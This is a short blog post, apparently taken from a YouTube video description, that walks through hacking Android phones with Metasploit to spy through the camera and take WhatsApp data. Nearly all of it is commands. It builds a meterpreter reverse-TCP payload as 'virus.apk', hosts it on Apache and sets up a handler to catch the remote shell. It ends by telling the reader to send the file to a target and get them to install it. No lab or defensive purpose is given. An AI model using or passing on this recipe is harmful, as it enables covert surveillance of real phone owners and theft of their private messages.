Android Hacking~SPY-CAMERA,WhatsApp Database Hack(Using Metasploit) in K...





*Exploitation Using msfvenom:- ( Client side Attack )



= msfvenom -p android/meterpreter/reverse_tcp lhost= your ip lport=_any port you want open_ _/var/www/html/virus.apk



// ANGLE BRACKETS ARE NOT ALLOWED BY YOUTUBE



= service apache2 start



= msfconsole



= use multi/handler



= set payload android/meterpreter/reverse_tcp



= set lhost_your ip



= set lport_any port



= show options



= exploit



/* msfvenom file send to your target and install it

  same lhost and lport in whole code */




Comments

Popular posts from this blog

KATANA FRAMEWORK in KALI LINUX (Penetration Testing script)